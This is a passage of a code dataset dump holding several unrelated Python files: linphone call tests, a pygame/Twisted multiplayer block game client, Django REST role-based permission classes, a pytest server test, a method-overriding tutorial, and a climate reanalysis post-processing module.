self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# tmp_dir = os.path.join(self.config.get_default_lp_data_dir(),\n# self.config.get('mh_lp.tmp_dir'))\n#\n# snapshot_path = os.path.join(tmp_dir, \"snapshot.jpg\")\n#\n# if not os.path.isdir(tmp_dir):\n# os.mkdir(tmp_dir)\n#\n# snapshot_path, ret = LPBaseTest.wrapper.snapshot(snapshot_path)\n# logger.debug(\"return of snapshot : %r\", str(ret))\n#\n# time.sleep(1)\n#\n# path_exist = os.path.exists(snapshot_path)\n#\n# self.assertTrue(path_exist, \"snapshot file %r doesn't exists\"\n# % snapshot_path)\n#\n# if path_exist:\n# os.unlink(snapshot_path)\n# else:\n# logger.error(\"cannot create snapshot\")\n# logger.error(\"command result: %r\", str(ret))\n#\n# #TODO: assert jpeg readable\n# #TODO: assert img resolution\n#\n# def test_03_preview_snapshot(self):\n# \"\"\" tests : if linphone can take preview-snapshot \"\"\"\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# tmp_dir = os.path.join(self.config.get_default_lp_data_dir(),\n# self.config.get('mh_lp.tmp_dir'))\n#\n# snapshot_path = os.path.join(tmp_dir, \"preview-snapshot.jpg\")\n#\n# if not os.path.isdir(tmp_dir):\n# os.mkdir(tmp_dir)\n#\n# snapshot_path, ret = LPBaseTest.wrapper.preview_snapshot(snapshot_path)\n# logger.debug(\"return of preview snapshot : %r\", str(ret))\n# time.sleep(1)\n#\n# path_exist = os.path.exists(snapshot_path)\n#\n# self.assertTrue(path_exist, \"preview snapshot file %r doesn't exists\"\n# % snapshot_path)\n#\n# if path_exist:\n# os.unlink(snapshot_path)\n# else:\n# logger.error(\"cannot create preview snapshot\")\n# logger.error(\"command result: %r\", str(ret))\n#\n# #TODO: assert jpeg readable\n# #TODO: assert img resolution\n#\n# def test_04_msg_on_call(self):\n# \"\"\" if linphone can send message on call \"\"\"\n# msg = \"one verry verry long message\"\n# LPBaseTest.wrapper.send_message(msg, self.remote_sip_addr)\n#\n# ret = self.remote_linphone.wait_for_message(15)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n#\n# (sender, rec_msg) = ret\n#\n# logger.debug(\"sender : %r;local addr : %r\", sender,\n# LPBaseTest.wrapper.identity)\n# self.assertEqual(sender, LPBaseTest.wrapper.identity,\n# \"remote sender and local addr must be the same\")\n# self.assertEqual(rec_msg, msg,\n# \"messages must be the same\")\n#\n# @attr(in_dev=True)\n# @attr(needs_mh_si_srv=True)\n# def test_05_preview_snapshot_command(self):\n# \"\"\" --- preview snapshot command \"\"\"\n# ctrl_msg = ControlMessage('rmt_preview_snapshot')\n# self.remote_linphone.send_control_message(LPBaseTest.wrapper.identity,\n# ctrl_msg.to_string())\n#\n# # time.sleep(2)\n#\n# logger.info('waiting for message')\n# ret = self.remote_linphone.wait_for_message(35)\n# self.assertIsNotNone(ret, \"rpc wait for message fail\")\n# if ret:\n# sender, rec_msg = ret\n# logger.debug(\"receive message from %r : %r\", sender, rec_msg)\n# else:\n# logger.error(\"error waiting message\")\n#\n# @attr(nightly=True)\n# def test_06_stress(self):\n# \"\"\" tests : if linphone can do a lot of call, without bug \"\"\"\n# self.assertTrue(LPBaseTest.wrapper.is_in_call(),\n# \"linphone is not on call, it should be\")\n#\n# start = time.time()\n#\n# # CALL_TIME = 20*60 # seconds\n# # TOTAL_TIME = 8*60*60 # seconds\n# CALL_TIME = 10 # seconds\n# TOTAL_TIME = 2*60 # seconds\n#\n# while (time.time() - start) < TOTAL_TIME:\n# # assert\n# self.assertTrue(LPBaseTest.wrapper.is_in_call() and\n# 
self.remote_linphone.is_in_call(),\n# \"both linphone must be on call\")\n#\n# # wait call_time\n# time.sleep(CALL_TIME)\n#\n# # terminate\n# LPBaseTest.wrapper.terminate_call()\n# logger.info('call terminated')\n#\n# ret = self.remote_linphone.wait_for_hangup(15)\n# self.assertIsNotNone(ret, \"rpc wait for hangup call fail\")\n#\n# # assert\n# self.assertFalse(LPBaseTest.wrapper.is_in_call() or\n# self.remote_linphone.is_in_call(),\n# \"both linphone mustn't be on call\")\n#\n# # call\n# LPBaseTest.wrapper.call(self.remote_sip_addr)\n# logger.debug('call launch')\n#\n# # answer\n# ret = self.remote_linphone.wait_for_incoming(15)\n# self.assertIsNotNone(ret, \"rpc wait incoming call fail\")\n#\n# self.remote_linphone.answer()\n# ret = self.remote_linphone.wait_for_answered(15)\n# self.assertIsNotNone(ret, \"rpc wait answered call fail\")\n# logger.debug('call answered')\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n# -----------------------------------------------------------------------------\n# End of file\n# -----------------------------------------------------------------------------\n","repo_name":"mhcomm/mh_linphone","sub_path":"pylib/lp_tests/mhlinphone_wrapper.py","file_name":"mhlinphone_wrapper.py","file_ext":"py","file_size_in_byte":13494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22084166955","text":"import pygame\nimport math\nfrom .game import game, images\nfrom .blocks import (\n GRASS,\n STONE,\n BEDROCK\n)\nfrom .constants import (\n CHUNK_SIZE,\n DESIRED_FPS,\n MAX_SPEED,\n MAX_SPRINT\n)\nfrom twisted.internet.protocol import DatagramProtocol\nfrom twisted.internet import reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol\nfrom twisted.protocols import amp\nfrom twisted.internet.task import LoopingCall\nfrom .commands import (\n GetChunk,\n UpdateMaterial,\n UpdateUserPosition\n)\nimport jsonpickle\nbg_images = images.bg_images\nbutton_images = images.button_images\n\nclass MulticastPingClient(DatagramProtocol):\n\n def startProtocol(self):\n # Join the multicast address, so we can receive replies:\n self.transport.joinGroup(\"228.0.0.5\")\n # Send to 228.0.0.5:8005 - all listeners on the multicast address\n # (including us) will receive this message.\n self.transport.write(b'Client: Ping', (\"228.0.0.5\", 8005))\n\n def datagramReceived(self, datagram, address):\n print(\"Datagram %s received from %s\" % (repr(datagram), repr(address)))\n\n\nclass GameClient(amp.AMP):\n def updateMaterial(self, x, y, material):\n game.world.setMaterial(x, y, material)\n return {'result': True}\n UpdateMaterial.responder(updateMaterial)\n\n def updateUserPosition(self, user, x, y):\n game.playerPositions[user] = (x, y)\n return {'result': True}\n UpdateUserPosition.responder(updateUserPosition)\n\n\nclass WorldCache:\n def __init__(self):\n self.chunks = {}\n\n def chunk(self, x, y):\n cx = math.floor(x / CHUNK_SIZE)\n cy = math.floor(y / CHUNK_SIZE)\n if not self.chunks.get(cx):\n self.chunks[cx] = {}\n if not self.chunks[cx].get(cy) or self.chunks[cx][cy] == 'pending':\n if not self.chunks[cx].get(cy):\n\n def receivedChunk(result):\n self.chunks[cx][cy] = jsonpickle.decode(result['chunk'])\n d = game.protocol.callRemote(GetChunk, x=x, y=y)\n d.addCallback(receivedChunk)\n self.chunks[cx][cy] = 'pending'\n\n return None\n return self.chunks[cx][cy]\n\n def cell(self, x, y):\n c = self.chunk(x, y)\n if c:\n return c.cell(x, y)\n return (1, 0)\n\n def updateMaterial(self, 
x, y, m):\n if self.cell(x, y)[0] == m:\n return\n self.setMaterial(x, y, m)\n\n def updatedMaterial(result):\n pass\n d = game.protocol.callRemote(\n UpdateMaterial, x=x, y=y, material=m)\n d.addCallback(updatedMaterial)\n\n def setMaterial(self, x, y, m):\n c = self.chunk(x, y)\n if c:\n c.setMaterial(x, y, m)\n\n\ndef createScreen(x, y):\n return pygame.display.set_mode((x, y), pygame.RESIZABLE)\n\n\ndef pixelToGame(pt):\n x = (pt[0] - game.sizex / 2.0) / game.tileSize + game.mx\n y = (pt[1] - game.sizey / 2.0) / game.tileSize + game.my\n return (x, y)\n\n\ndef gameToPixel(pt):\n x = (pt[0] - game.mx) * game.tileSize + game.sizex / 2.0\n y = (pt[1] - game.my) * game.tileSize + game.sizey / 2.0\n return (x, y)\n\n\ndef play():\n game.startScreenLoop.stop()\n if game.host == '__builtin__':\n # Start a server as a subprocess\n import subprocess\n import time\n import sys\n import os\n command = os.path.join(os.path.dirname(sys.executable), 'make-a-game-server')\n args = [\n command,\n '--world', game.worldName,\n '--seed', str(game.seed),\n '--port', str(game.port)\n ]\n serverProc = subprocess.Popen(args, stdout=sys.stdout, stderr=sys.stderr)\n time.sleep(1)\n\n import atexit\n def doExit():\n print('Stopping server...')\n serverProc.terminate()\n atexit.register(doExit)\n\n #pygame.event.set_grab(True)\n #pygame.mouse.set_visible(False)\n game.font = pygame.font.SysFont('Comic Sans MS', 30)\n game.screen = createScreen(game.sizex, game.sizey)\n game.world = WorldCache()\n if game.host == '__builtin__':\n connectionHost = 'localhost'\n else:\n connectionHost = game.host\n game.server = TCP4ClientEndpoint(reactor, connectionHost, game.port)\n\n def connected(ampProto):\n game.protocol = ampProto\n # Set up a looping call every 1/30th of a second to run your game tick\n tick = LoopingCall(gameTick)\n tick.start(1.0 / DESIRED_FPS)\n connectProtocol(game.server, GameClient()).addCallback(connected)\n\n\ndef gamestart():\n import sys\n import os\n game.screen = createScreen(game.sizex, game.sizey)\n mouse = pygame.mouse.get_pos()\n clicked = False\n #grab = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n reactor.stop()\n if event.type == pygame.VIDEORESIZE:\n game.sizex = event.w\n game.sizey = event.h\n game.screen = createScreen(game.sizex, game.sizey)\n if event.type == pygame.MOUSEBUTTONDOWN:\n clicked = True\n path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'imgs')\n if game.screen_number == 0:\n game.screen.blit(pygame.transform.scale(bg_images[\"start_bg\"], (game.sizex, game.sizey)), (0, 0))\n button1Rect = pygame.Rect((0, 0), button_images[\"play_button\"].get_size())\n button2Rect = pygame.Rect((0, 0), button_images[\"multiplayer_button\"].get_size())\n button1Rect.center = (game.sizex/2, game.sizey/2)\n button2Rect.center = (game.sizex/2, game.sizey/2+70)\n if button1Rect.collidepoint(mouse):\n game.screen.blit(button_images[\"play_button_pressed\"], button1Rect.topleft)\n if clicked:\n game.screen_number = \"singleplayer\"\n play()\n else:\n game.screen.blit(button_images[\"play_button\"], button1Rect.topleft)\n if button2Rect.collidepoint(mouse):\n game.screen.blit(button_images[\"multiplayer_button_pressed\"], button2Rect.topleft)\n if clicked:\n game.screen_number = \"multiplayer\"\n else:\n game.screen.blit(button_images[\"multiplayer_button\"], button2Rect.topleft)\n elif game.screen_number == \"multiplayer\":\n game.screen.blit(pygame.transform.scale(bg_images[\"lan_bg\"], (game.sizex, game.sizey)), (0, 0))\n\n # for name in 
lan_games:\n # pass\n\n\n elif game.screen_number == \"singlplayer\":\n pass\n pygame.display.flip()\n\ndef gameTick():\n #grab = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n reactor.stop()\n if event.type == pygame.VIDEORESIZE:\n game.sizex = event.w\n game.sizey = event.h\n game.screen = createScreen(game.sizex, game.sizey)\n # if event.type == pygame.MOUSEBUTTONDOWN:\n # pygame.event.set_grab(True)\n # pygame.mouse.set_visible(False)\n # grab = True\n pressed = pygame.key.get_pressed()\n speedlimit = MAX_SPEED\n if pressed[pygame.K_LSHIFT]:\n speedlimit = MAX_SPRINT\n if pressed[pygame.K_UP]:\n game.fly = True\n if pressed[pygame.K_LEFT]:\n game.tileSize *= 1.1\n game.tileSize = round(game.tileSize)\n if pressed[pygame.K_RIGHT]:\n game.tileSize /= 1.1\n game.tileSize = round(game.tileSize)\n if pressed[pygame.K_DOWN]:\n game.fly = False\n if pressed[pygame.K_w]:\n if game.vy >= -speedlimit:\n game.vy -= 0.02\n if pressed[pygame.K_s]:\n if game.vy <= speedlimit:\n game.vy += 0.02\n if pressed[pygame.K_a]:\n if game.vx >= -speedlimit:\n game.vx -= 0.02\n if pressed[pygame.K_d]:\n if game.vx <= speedlimit:\n game.vx += 0.02\n # if pressed[pygame.K_ESCAPE]:\n # pygame.event.set_grab(False)\n # pygame.mouse.set_visible(True)\n # grab = False\n if abs(game.vx) < 0.02:\n game.vx = 0\n if game.vx < -speedlimit:\n game.vx = -speedlimit\n if game.vx > speedlimit:\n game.vx = speedlimit\n if game.vx > 0 and not pressed[pygame.K_d]:\n game.vx -= 0.02\n if game.vx < 0 and not pressed[pygame.K_a]:\n game.vx += 0.02\n\n if abs(game.vy) < 0.02:\n game.vy = 0\n if game.vy < -speedlimit:\n game.vy = -speedlimit\n if game.vy > speedlimit:\n game.vy = speedlimit\n if game.vy > 0 and not pressed[pygame.K_s]:\n game.vy -= 0.02\n if game.vy < 0 and not pressed[pygame.K_w]:\n game.vy += 0.02\n\n userSize = 0.5\n\n nx = math.floor(game.mx)\n ny = math.floor(game.my)\n\n minX = game.mx - 1.0\n maxX = game.mx + 1.0\n minY = game.my - 1.0\n maxY = game.my + 1.0\n if not game.fly:\n if (game.world.cell(nx - 1, ny)[0] or\n game.my - ny < userSize / 2 and game.world.cell(nx - 1, ny - 1)[0] or\n game.my - ny > 1 - userSize / 2 and game.world.cell(nx - 1, ny + 1)[0]):\n\n minX = nx + userSize / 2\n if (game.world.cell(nx + 1, ny)[0] or\n game.my - ny < userSize / 2 and game.world.cell(nx + 1, ny - 1)[0] or\n game.my - ny > 1 - userSize / 2 and game.world.cell(nx + 1, ny + 1)[0]):\n\n maxX = nx + 1 - userSize / 2\n\n if (game.world.cell(nx, ny - 1)[0] or\n game.mx - nx < userSize / 2 and game.world.cell(nx - 1, ny - 1)[0] or\n game.mx - nx > 1 - userSize / 2 and game.world.cell(nx + 1, ny - 1)[0]):\n\n minY = ny + userSize / 2\n if (game.world.cell(nx, ny + 1)[0] or\n game.mx - nx < userSize / 2 and game.world.cell(nx - 1, ny + 1)[0] or\n game.mx - nx > 1 - userSize / 2 and game.world.cell(nx + 1, ny + 1)[0]):\n\n maxY = ny + 1 - userSize / 2\n\n game.mx += game.vx\n game.my += game.vy\n\n game.mx = min(maxX, max(minX, game.mx))\n game.my = min(maxY, max(minY, game.my))\n\n game.protocol.callRemote(UpdateUserPosition, user=game.username, x=game.mx, y=game.my)\n\n halfX = math.floor(0.6 * game.sizex / game.tileSize)\n halfY = math.floor(0.6 * game.sizey / game.tileSize)\n\n px, py = pygame.mouse.get_pos()\n px = max(px, game.sizex / 2.0 - 3.0 * game.tileSize)\n px = min(px, game.sizex / 2.0 + 3.0 * game.tileSize)\n py = max(py, game.sizey / 2.0 - 3.0 * game.tileSize)\n py = min(py, game.sizey / 2.0 + 3.0 * game.tileSize)\n if pygame.event.get_grab():\n pygame.mouse.set_pos((px, py))\n oxRaw, 
oyRaw = pixelToGame((px, py))\n ox = math.floor(oxRaw)\n oy = math.floor(oyRaw)\n if pressed[pygame.K_1]:\n game.slotMaterial = 1\n if pressed[pygame.K_2]:\n game.slotMaterial = 2\n\n if pressed[pygame.K_SPACE]:\n game.world.updateMaterial(ox, oy, game.slotMaterial)\n\n if pressed[pygame.K_b]:\n game.world.updateMaterial(ox, oy, 0)\n\n for x in range(-halfX, halfX + 1):\n for y in range(-halfY, halfY + 1):\n (material, delta) = game.world.cell(nx + x, ny + y)\n if material == 0:\n color = list(GRASS)\n elif material == 1:\n color = list(STONE)\n elif material == 2:\n color = list(BEDROCK)\n for i in range(3):\n color[i] += delta\n color[i] = min(255, max(0, color[i]))\n tx, ty = gameToPixel((nx + x, ny + y))\n pygame.draw.rect(\n game.screen, color,\n pygame.Rect(tx, ty, game.tileSize, game.tileSize))\n ux, uy = gameToPixel((game.mx, game.my))\n pygame.draw.rect(\n game.screen, (0, 0, 0),\n pygame.Rect(\n ux - game.tileSize / 2 / 2.0,\n uy - game.tileSize / 2 / 2.0,\n game.tileSize / 2, game.tileSize / 2))\n\n for user, pos in game.playerPositions.items():\n if user != game.username:\n playerX, playerY = gameToPixel(pos)\n pygame.draw.rect(\n game.screen, (200, 0, 0),\n pygame.Rect(\n playerX - game.tileSize / 2 / 2,\n playerY - game.tileSize / 2 / 2,\n game.tileSize / 2, game.tileSize / 2))\n boxX, boxY = gameToPixel((ox, oy))\n pygame.draw.rect(\n game.screen, (0, 0, 0),\n pygame.Rect(\n boxX, boxY,\n game.tileSize, game.tileSize\n ), 1)\n pygame.draw.line(\n game.screen, (0, 0, 0),\n (px - 4, py),\n (px + 4, py))\n pygame.draw.line(\n game.screen, (0, 0, 0),\n (px, py - 4),\n (px, py + 4))\n\n x = game.font.render(str(round(game.mx)), False, (0, 0, 0))\n y = game.font.render(str(round(game.my)), False, (0, 0, 0))\n x2 = game.font.render(\"X:\", False, (0, 0, 0))\n y2 = game.font.render(\"Y:\", False, (0, 0, 0))\n\n game.screen.blit(x, (35, 0))\n game.screen.blit(x2, (0, 0))\n game.screen.blit(y, (35, 25))\n game.screen.blit(y2, (0, 25))\n pygame.display.flip()\n\n\ndef startGame(username, host, port, world, seed):\n from twisted.python.log import startLogging\n from sys import stdout\n\n startLogging(stdout)\n\n game.username = username\n game.host = host\n game.port = port\n game.worldName = world\n game.seed = seed\n\n pygame.init()\n pygame.font.init()\n game.sizex = 500\n game.sizey = 500\n game.startScreenLoop = LoopingCall(gamestart)\n game.startScreenLoop.start(1.0 / DESIRED_FPS)\n\n reactor.listenMulticast(8005, MulticastPingClient(), listenMultiple=True)\n reactor.run()\n","repo_name":"jeffbaumes/make-a-game","sub_path":"src/make_a_game/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24296401494","text":"from rest_framework import permissions\nfrom rest_framework_jwt.utils import jwt_decode_handler\nfrom django.shortcuts import redirect,render\n\n\nclass IsDaily(permissions.BasePermission):\n \"\"\"\n Custom permission to only allow owners of an object to edit it.\n \"\"\"\n\n def has_permission(self, request, view):\n # Read permissions are allowed to any request\n token = request.META.get(\"HTTP_AUTHORIZATION\").split(' ')\n a = jwt_decode_handler(token[2])\n if a['role'] == 1:\n if request.method == 'POST':\n return True\n elif request.method == 'GET':\n return True\n else:\n return False\n elif a['role'] == 2 or a['role'] == 7:\n if request.method == 'POST':\n return False\n elif request.method == 'GET':\n return True\n else:\n return 
False\n        else:\n            print (\"xsxs\")\n            return False\n\n\nclass IsHarry(permissions.BasePermission):\n    \"\"\"\n    Custom permission to only allow owners of an object to edit it.\n    \"\"\"\n\n    def has_permission(self, request, view):\n        token = request.META.get(\"HTTP_AUTHORIZATION\").split(' ')\n        trole = jwt_decode_handler(token[2])\n        if trole['role'] == 2:\n            return True\n        else:\n            if request.method == 'GET':\n                return True\n            return False\n\n","repo_name":"haominqu/pythoncrm","sub_path":"pythoncrm/daily/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21063034946","text":"from time import time, sleep\nfrom contextlib import contextmanager\nimport subprocess\n\nCONFIG_YAML = \"\"\"\\\nlisten: localhost:14877\nroutes:\n  GET /now:\n    command: echo hello world\n\"\"\"\n\ndef wait_for_url(url):\n    t0 = time()\n    while True:\n        try:\n            subprocess.check_call(['curl', '-s', url])\n            return\n        except subprocess.CalledProcessError:\n            if time() - t0 < 3:\n                sleep(.1)\n            else:\n                raise\n\n@contextmanager\ndef server(config_yaml):\n    p = subprocess.Popen(\n        ['python', 'csi.py', str(config_yaml)],\n        stdout=subprocess.PIPE,\n        stderr=subprocess.STDOUT,\n    )\n    wait_for_url('http://localhost:14877')\n\n    try:\n        yield\n\n    finally:\n        p.terminate()\n        out, _ = p.communicate()\n        print(out.decode('utf-8'))\n        p.wait()\n\ndef test_serve(tmpdir):\n    config_yaml = tmpdir / 'config.yaml'\n    config_yaml.write(CONFIG_YAML)\n    with server(config_yaml):\n        url = 'http://localhost:14877/now'\n        content = subprocess.check_output(['curl', '-s', url])\n        assert content == b'hello world\\n'\n","repo_name":"mgax/csi","sub_path":"testsuite/test_serve.py","file_name":"test_serve.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5872790494","text":"#3)Overriding\r\nprint(\"****Method Overriding*****\")\r\n\"\"\"Whatever members are available in the parent class are by default available to the child\r\nclass through inheritance. If the child class is not satisfied with the parent class\r\nimplementation, then the child class is allowed to redefine that method in the child class\r\nbased on its requirement. This concept is called overriding.\r\n--->The overriding concept is applicable to both methods and constructors. 
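A minimal illustrative sketch of the idea (the class names here are hypothetical;\r\nrunnable demos follow below):\r\n\r\n    class Parent:\r\n        def greet(self): print(\"parent\")\r\n\r\n    class Child(Parent):\r\n        def greet(self): print(\"child\")   # redefines (overrides) Parent.greet\r\n\r\n    Child().greet()   # prints child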
\"\"\"\r\nclass P:\r\n def property(self):\r\n print(\"Gold+Land+Cash\")\r\n def marry(self):\r\n print(\"AMB\")\r\nclass C(P):\r\n def marry(self):\r\n print(\"Arr\")\r\n\r\nc=C()\r\nc.property()\r\nc.marry()\r\n\r\nprint(\"***Constructor Overriding*****\")\r\nclass Father:\r\n def __init__(self):\r\n print(\"Father Constructor\")\r\nclass Me(Father):\r\n def __init__(self):\r\n print(\"My constructor\")\r\nm=Me()\r\n\r\nprint(\"***to call Parent Class Constructor by using super()*****\")\r\nclass Person:\r\n def __init__(self,name,age):\r\n self.name=name\r\n self.age=age\r\nclass Employee(Person):\r\n def __init__(self,name,age,eno,esal):\r\n super().__init__(name,age)\r\n self.eno=eno\r\n self.esal=esal\r\n def display(self):\r\n print(\"Emp name : \",self.name)\r\n print(\"Emp Age : \",self.age)\r\n print(\"Emp eno : \",self.eno)\r\n print(\"Emp esal : \",self.esal)\r\n\r\ne=Employee(\"venky\",24,101,55000)\r\ne.display()\r\nprint(\"\\n\")\r\ne1=Employee(\"Ravi\",25,102,60000)\r\ne1.display()\r\nprint(\"\\n\")\r\ne2=Employee(\"Hari\",26,103,50000)\r\ne2.display()\r\n","repo_name":"VenkyGajula/Python_Advance_OOPS","sub_path":"overriding.py","file_name":"overriding.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43080768274","text":"\"\"\"\nPost-processing analysis on T_ref and phi_eff to produce pretty plots for diagnostic and publication purposes.\n\"\"\"\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport pandas as pd\nfrom scipy import fft, fftpack\nfrom scipy.stats import skew\nfrom matplotlib.colors import LogNorm\nimport joypy\nimport cartopy.crs as ccrs\nfrom descriptors import cachedproperty\nfrom distributed.client import _get_global_client\n\nclass SingleModelPostProcessor(object):\n \"\"\" Post-processing routines for analysis of climate models and reanalysis\n with T-prime, effective latitude and surface temperature data\n \"\"\"\n\n def __init__(self,\n path_to_input_files,\n chunks={'time': 1},\n diagnostic_var='t_prime',\n season='DJF'):\n self.chunks = chunks\n self.path_to_files = path_to_input_files\n self.season = season\n self.var = diagnostic_var\n\n @staticmethod\n def sel_winters(data,start_year=2015,end_year=2100):\n winters = pd.date_range('%i-12-01'%start_year,'%i-02-28'%(start_year+1),freq='D')\n for i in range(start_year+1,end_year):\n begin = i\n end = i+1\n winters=winters.union(pd.date_range('%i-12-01'%begin,'%i-02-28'%end,freq='D'))\n try:\n selected = data.sel(time=winters)\n except KeyError: # if my last year doesn't have JF\n winters = winters.drop(pd.date_range('%i-01-01'%end_year,\n '%i-02-28'%end_year,\n freq='D'\n )\n )\n selected = data.sel(time=winters)\n return selected\n\n @cachedproperty\n def dataset(self):\n\n client = _get_global_client()\n if client is None:\n print(f'WARNING! 
No Dask client available in environment!')\n\n _full_dataset = xr.open_mfdataset(self.path_to_files,\n chunks=self.chunks,\n concat_dim='time',\n preprocess=self.preprocess_mf)\n self.year_range = np.unique(_full_dataset.time.dt.year)[[0,-1]]\n if self.season == 'DJF':\n try:\n _full_dataset['time'] = _full_dataset.indexes['time'].normalize()\n except AttributeError:\n _full_dataset['time'] = _full_dataset.indexes['time'].to_datetimeindex().normalize()\n _dataset=self.sel_winters(_full_dataset,*self.year_range)\n return _dataset\n elif season == 'all':\n return _full_dataset\n else:\n raise NotImplementedError\n\n @staticmethod\n def preprocess_mf(array):\n var = list(array.variables.keys())[-1]\n if var not in ['eff_lat','t_prime','t_ref', 'tas']:\n array = array.rename({var: 'eff_lat'})\n var='eff_lat'\n array_filter = array.where(array[var] != 0)\n array_new = array_filter.sortby('time')\n return array_new\n\n @staticmethod\n def demean(data, decade=False):\n \"\"\" Calculate demeaned anomaly with daily and decadal baselines\n\n This function calculates the demeaded temperature by either calculating\n a day-of-the-year baseline mean, by default, or by calculating a decade mean.\n This operation is grid-based, so it is calculating daily and decade\n means. \n\n Parameters\n ---------\n - decade bool: Demean by decades. Default is `False`.\n\n Returns\n ------\n xr.Dataset\n \"\"\"\n\n if decade:\n #data = data.assign_coords(year=('time',\n # group_into_winters(data.time)))\n decade_day_idx = pd.MultiIndex.from_arrays(\n [((data.time.dt.year//10)*10).data,\n data.time.dt.dayofyear.data])\n data.coords['decade_day'] = ('time', decade_day_idx)\n grp_by = 'decade_day'\n else:\n grp_by = 'time.dayofyear'\n\n xr_mean = (data.\n groupby(grp_by).\n mean()\n )\n\n demeaned = data.groupby(grp_by) - xr_mean\n return demeaned.drop('decade_day',errors='ignore')\n\n def demeaned_shift(self, data, decade=False):\n \"\"\" Shifted demeaned effective latitude\n\n This function takes the effective latitude data, demeans it, and adds back\n the real latitude to get an infomative measurement of effective\n latitude instead of an anomaly.\n\n Returns\n -------\n xr.Dataset\n \"\"\"\n\n demeaned_array = self.demean(data, decade=decade)\n demeaned_shift = demeaned_array + data.lat\n\n return demeaned_shift\n\n def stats_calc(self,data):\n try:\n data = data.drop('expver')\n except ValueError:\n pass\n mean = data.mean(dim='time')[self.var]\n std = data.std(dim='time')[self.var]\n skewness = xr.DataArray(\n data=skew(data[self.var], nan_policy='omit'),\n dims=mean.dims,\n coords=mean.coords\n )\n #statistics = xr.Dataset(dict(stats=(\n # ['stat','lat','lon'],[\n # mean,\n # std,\n # xr.ones_like(mean)*skewness\n # ])\n # ),\n # coords={'stat':['mean','std','skewness'],\n # 'lat':mean.lat,'lon':mean.lon}\n # )\n statistics=xr.concat(\n [mean,std,skewness],#skewness*xr.ones_like(mean)],\n dim='stat'\n ).assign_coords({'stat':['mean','std','skew']})\n return statistics\n\n def diagnostic_stats(self,demean=False):\n data=self.dataset\n present = (self.year_range[0],self.year_range[0]+10)\n future = (self.year_range[-1]-10,self.year_range[-1])\n self.data_present = self.sel_winters(data,*present)\n self.data_future = self.sel_winters(data,*future)\n\n if demean:\n try:\n data_present_dm = self.data_present_dm\n data_future_dm = self.data_future_dm\n except AttributeError:\n data_present_dm = self.demean(self.data_present)\n data_future_dm = self.demean(self.data_future)\n self.stats_present = 
self.stats_calc(data_present_dm)\n self.stats_future = self.stats_calc(data_future_dm)\n self.stats_diff = self.stats_future - self.stats_present\n\n else:\n self.stats_present = self.stats_calc(self.data_present)\n self.stats_future = self.stats_calc(self.data_future)\n self.stats_diff = self.stats_future - self.stats_present\n\n def diagnostic_plot(self, demean=False, path_to_save=\"./\"):\n self.diagnostic_stats(demean=demean)\n xr_all = xr.concat([\n self.stats_present,\n self.stats_future,\n self.stats_diff],\n dim='period').assign_coords({\n 'period':['first_decade','last_decade','difference']\n })\n xr_all.to_netcdf(path_to_save+'_statistics.nc4')\n print('plotting...')\n p = xr_all.sel(stat='mean').plot.imshow(\n transform=ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection':ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_mean.png')\n p = xr_all.sel(stat='std').plot.imshow(\n transform = ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection': ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_std.png')\n p = xr_all.sel(stat='skew').plot.imshow(\n transform=ccrs.PlateCarree(),\n col='period',\n subplot_kws={\n 'projection':ccrs.Orthographic(20, 90)\n }\n )\n for ax in p.axes.flat:\n ax.coastlines()\n ax.gridlines()\n plt.savefig(path_to_save+'_skew.png')\n\n\n#---- helper functions ----#\ndef run_demeaning(path_processed,\n shortname,\n path_postproc,\n var_of_interest,\n decade=False):\n #create class\n single = SingleModelPostProcessor(path_to_input_files=path_processed,\n diagnostic_var=var_of_interest,\n season='DJF')\n #demean or shift\n filename=path_postproc+f'{shortname}_{var_of_interest}_demeaned.nc4'\n single.demean(single.dataset[var_of_interest],decade=decade\n ).rename(f'dm_{var_of_interest}').to_netcdf(filename)\n #elif var_of_interest == 'eff_lat':\n # filename=path_postproc+f'{shortname}_{var_of_interest}_demeaned_shifted.nc4'\n # single.demeaned_shift(single.dataset,\n # decade=decade).rename({var_of_interest: 'phi_eq_prime'}\n # ).to_netcdf(filename)\n return single\n\ndef group_into_winters(dates):\n year_arr = np.zeros(len(dates),dtype=int)\n y=0\n for date in dates:\n if date.dt.month <= 3:\n year_arr[y] = date.dt.year - 1\n else:\n year_arr[y] = date.dt.year\n y+=1\n return year_arr\n","repo_name":"geosciences-data-practicum/reanalysis_getter","sub_path":"jetstream/post_proc.py","file_name":"post_proc.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4070493248","text":"import os\nfrom typing import Dict, Optional\n\nfrom idoitapi.Request import Request\nfrom idoitapi.APIException import JSONRPC\nfrom idoitapi.CMDBObject import CMDBObject\nfrom idoitapi.CMDBObjects import CMDBObjects\nfrom idoitapi.CMDBCategory import CMDBCategory\nfrom idoitapi.utils import 